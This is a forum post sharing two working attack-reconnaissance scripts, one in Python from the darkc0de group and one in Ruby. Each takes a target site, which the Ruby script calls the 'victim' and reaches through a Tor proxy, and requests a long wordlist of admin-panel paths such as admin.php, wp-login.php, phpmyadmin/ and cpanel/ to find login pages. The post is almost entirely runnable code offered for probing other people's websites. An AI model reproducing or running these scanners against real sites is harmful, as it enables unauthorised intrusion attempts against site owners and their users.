    #    / __ |\__  \\_  __ \  |/ // ___\/  /_\  \  / __ |/ __ \   # 
    #   / /_/ | / __ \|  | \/    <\  \___\  \_/   \/ /_/ \  ___/   # 
    #   \____ |(______/__|  |__|_ \\_____>\_____  /\_____|\____\   # 
    #        \/                  \/             \/                 # 
    #                   ___________   ______  _  __                # 
    #                 _/ ___\_  __ \_/ __ \ \/ \/ /                # 
    #                 \  \___|  | \/\  ___/\     /                 # 
    #                  \___  >__|    \___  >\/\_/                  # 
    #      est.2007        \/            \/   forum.darkc0de.com   # 
    ################################################################ 
    # ---  d3hydr8 - rsauron - P47r1ck - r45c4l - C1c4Tr1Z - bennu # 
    # ---  QKrun1x  - skillfaker - Croathack - Optyx - Nuclear     #
    # ---  Eliminator and to all members of darkc0de and ljuska.org# 
    ################################################################ 
    #
    #
    # Based on Web admin locator by Lipun4u
    #
    #
    #
    
    
    
    import sys, os, time, httplib
    
    if sys.platform == 'linux' or sys.platform == 'linux2':
    	clearing = 'clear'
    else:
    	clearing = 'cls'
    os.system(clearing)
    
    
    if len(sys.argv) != 2:
    	print "\n|---------------------------------------------------------------|"
            print "| b4ltazar[@]gmail[dot]com                                      |"
            print "|   03/2009     Admin login finder     v2.0                     |"
    	print "| Help: admin-find.py -h                                        |"
    	print "| Visit www.darkc0de.com and www.ljuska.org                     |"
            print "|---------------------------------------------------------------|\n"
    	sys.exit(1)
    	
    for arg in sys.argv:
    	if arg == '-h':
    		print "\n|-------------------------------------------------------------------------------|"
                    print "| b4ltazar[@]gmail[dot]com                                                      |"
                    print "|   03/2009      Admin login finder     v2.0                                    |"
                    print "| Usage: admin-find.py www.site.com                                             |"
    	        print "| Example: admin-find.py site.com                                               |"
    	        print "| Visit www.darkc0de.com and www.ljuska.org                                     |"
                    print "|-------------------------------------------------------------------------------|\n"
    		sys.exit(1)
    	
    	
    
    site = sys.argv[1].replace("http://","").rsplit("/",1)[0] 
    site = site.lower()
    
    admin_path = ['admin.php','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/','memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php','joomla/administrator','login.php',
    'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html','admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html','admin/controlpanel.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html','webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html','admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php','administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php','bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','modelsearch/login.php','moderator.php','moderator/login.php','moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php',
    'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html','webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html','administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html','panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','adminarea/index.php','adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php','modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php','adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php']
    
    
    print "\n|---------------------------------------------------------------|"
    print "| b4ltazar[@]gmail[dot]com                                      |"
    print "|   03/2009      Admin login finder     v2.0                    |"
    print "| Visit www.darkc0de.com and www.ljuska.org                     |"
    print "|---------------------------------------------------------------|\n"
    print "\n[-] %s" % time.strftime("%X")
    		
    print "[+] Target:",site
    print "[+] Checking paths..."
    print
    
    
    try:
    	for admin in admin_path:
    		admin = admin.replace("\n","")
    		admin = "/" + admin
    		connection = httplib.HTTPConnection(site)
    		connection.request("GET",admin)
    		response = connection.getresponse()
    		print "%s %s %s" % (admin, response.status, response.reason)
    except(KeyboardInterrupt,SystemExit):
    		raise
    except:
    		pass
    
    Admin login finder [ Ruby ]​

    Код:
    #!/usr/bin/ruby
    #
    #
    # [email protected]
    # $login-finder.rb
    # 
    # Codado por FuRt3X
    #
    # h4x0r(~)$ ruby login-finder.rb www.xxx.com /
    #[*] Admin login finder
    #[*] Codado por FuRt3X
    #
    # testando: /admin/
    # encontrado: /admin/
    # 
    #
    require 'net/http'
    
    
    vitima = ARGV[0]
    path = ARGV[1]
    
    ### tor proxy
    proxy = '127.0.0.1'
    proxy_porta = 8118
    
    if ARGV.length != 2 
        puts "#{$0} www.vitima.com.br [ /path/ or / ]"
        exit
    end  
    
    
    
    painels = ["admin/", "admin1.php", "administrador/", "administracao/", "painel/", "administraçao/" , 
    "administracao.php", "administraçao.php", "administrateur/", "administrateur.php", "beheerder/", 
    "administracion/", "administracion.php","beheerder.php", "adminisztrátora/", "adminisztrátora.php", 
    "amministratore/", "amministratore.php", "v2/painel/", "admin1.html", "admin2.php", "admin2.html", 
    "yonetim.php", "yonetim.html", "yonetici.php", "yonetici.html", "ccms/", "ccms/login.php", "ccms/index.php", "maintenance/", 
    "webmaster/", "adm/", "configuration/", "configure/", "websvn/", "admin/account.php", 
    "admin/account.html", "admin/index.php", "admin/index.html", "admin/login.php", "admin/login.html", "admin/home.php", "admin/controlpanel.html", "admin/controlpanel.php", "admin.php", "admin.html", "admin/cp.php", "admin/cp.html", "cp.php", "cp.html", "administrator/", "administrator/index.html", "administrator/index.php", "administrator/login.html", "administrator/login.php", "administrator/account.html", "administrator/account.php", "administrator.php", "administrator.html", "login.php", "login.html", "modelsearch/login.php", "moderator.php", "moderator.html", "moderator/login.php", "moderator/login.html", "moderator/admin.php", "moderator/admin.html", "moderator/", "account.php", "account.html", "controlpanel/", "controlpanel.php", "controlpanel.html", "admincontrol.php", "admincontrol.html", "adminpanel.php", "adminpanel.html", "admin1.asp", "admin2.asp", "yonetim.asp", "yonetici.asp", "admin/account.asp", "admin/index.asp", "admin/login.asp", "admin/home.asp", "admin/controlpanel.asp", "admin.asp", "admin/cp.asp", "cp.asp", "administrator/index.asp", "administrator/login.asp", "administrator/account.asp", "administrator.asp", "login.asp", "modelsearch/login.asp", "moderator.asp", "moderator/login.asp", "moderator/admin.asp", "account.asp", "controlpanel.asp", "admincontrol.asp", "adminpanel.asp", "fileadmin/", "fileadmin.php", "fileadmin.asp", "fileadmin.html", "administration/", "administration.php", "administration.html", "sysadmin.php", "sysadmin.html", "phpmyadmin/", "myadmin/", "sysadmin.asp", "sysadmin/", "ur-admin.asp", "ur-admin.php", "ur-admin.html", "ur-admin/", "Server.php", "Server.html", "Server.asp", "Server/", "wp-admin/", "administr8.php", "administr8.html", "administr8/", "administr8.asp", "webadmin/", "webadmin.php", "webadmin.asp", "webadmin.html", "administratie/", "admins/", "admins.php", "admins.asp", "admins.html", "administrivia/", "Database_Administration/", "WebAdmin/", "useradmin/", "sysadmins/", "admin1/", "system-administration/", "administrators/", "pgadmin/", "directadmin/", "staradmin/", "ServerAdministrator/", "SysAdmin/", "administer/", "LiveUser_Admin/", "sys-admin/", "typo3/", "panel/", "cpanel/", "cPanel/", "cpanel_file/", "platz_login/", "rcLogin/", "blogindex/", "formslogin/", "autologin/", "support_login/", "meta_login/", "manuallogin/", "simpleLogin/", "loginflat/", "utility_login/", "showlogin/", "memlogin/", "members/", "login-redirect/", "sub-login/", "wp-login/", "login1/", "dir-login/", "login_db/", "xlogin/", "smblogin/", "customer_login/", "UserLogin/", "login-us/", "acct_login/", "admin_area/", "bigadmin/", "project-admins/", "phppgadmin/", "pureadmin/", "sql-admin/", "radmind/", "openvpnadmin/", "wizmysqladmin/", "vadmind/", "ezsqliteadmin/", "hpwebjetadmin/", "newsadmin/", "adminpro/", "Lotus_Domino_Admin/", "bbadmin/", "vmailadmin/", "Indy_admin/", "ccp14admin/", "irc-macadmin/", "banneradmin/", "sshadmin/", "phpldapadmin/", "macadmin/", "administratoraccounts/", "admin4_account/", "admin4_colon/", "radmind-1/", "Super-Admin/", "AdminTools/", "cmsadmin/", "SysAdmin2/", "globes_admin/", "cadmins/", "phpSQLiteAdmin/", "navSiteAdmin/", "server_admin_small/", "logo_sysadmin/", "server/", "database_administration/", "power_user/", "system_administration/", "ss_vms_admin_sm/"]
    
    
    
    puts "[*] Admin login finder"
    puts "[*] Codado por FuRt3X"
    puts
    
    painels.each { |brute|
         http = Net::HTTP::Proxy(proxy, proxy_porta).new(vitima)
         find_lg = path + brute 
         headers, body = http.get(find_lg)
         
         puts "testando: #{find_lg}"
    
         if headers.code =~ /200/
            print "encontrado: #{find_lg}\n"
            exit
         end 
    }
    
    print "portal de login nao encontrado =( \n"
    
     
    2 пользователям это понравилось.

Поделиться этой страницей